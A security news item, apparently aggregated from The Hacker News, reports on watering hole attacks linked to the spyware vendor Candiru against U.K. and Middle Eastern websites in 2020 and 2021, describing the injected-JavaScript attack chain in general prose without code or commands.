Security News > 2021 > November > Israel's Candiru Spyware Found Linked to Watering Hole Attacks in U.K and Middle East

Israel's Candiru Spyware Found Linked to Watering Hole Attacks in U.K and Middle East
2021-11-17 03:10

Israeli spyware vendor Candiru, which was added to an economic blocklist by the U.S. government this month, is said to have reportedly waged "Watering hole" attacks against high-profile entities in the U.K. and the Middle East, new findings reveal.

The strategic web compromises are believed to have occurred in two waves, the first commencing as early as March 2020 before ending in August 2020, and the second string of attacks beginning in January 2021 and lasting until early August 2021, when the targeted websites were stripped clean off the malicious scripts.

Watering hole attacks are a form of highly targeted intrusions in that they tend to infect a specific group of end-users by backdooring websites that members of the group are known to frequent with the goal of opening a gateway into their machines for follow-on exploitation activities.

The original attack chains involved injecting JavaScript code into the websites from a remote attacker-controlled domain that's designed to collect and exfiltrated I.P. geolocation and system information about the victim machine, opting to proceed further only if the operating system in question is either Windows or macOS, suggesting the campaign was orchestrated to target computers and not mobile devices.

The second wave observed in January 2021 was characterized by more stealth, as the JavaScript modifications were made to legitimate WordPress scripts used by the websites instead of adding the malicious code straight to the main HTML page, using the method to load a script from a server under the attacker's control.

The campaign's links to Candiru stems from the fact that some of the command-and-control servers utilized by the attackers are similar to domains previously identified as belonging to the Israeli company, not to mention feature browser-based remote code execution exploits in its arsenal, raising the possibility that "The operators of the watering holes are customers of Candiru."


News URL

https://thehackernews.com/2021/11/israels-candiru-spyware-found-linked-to.html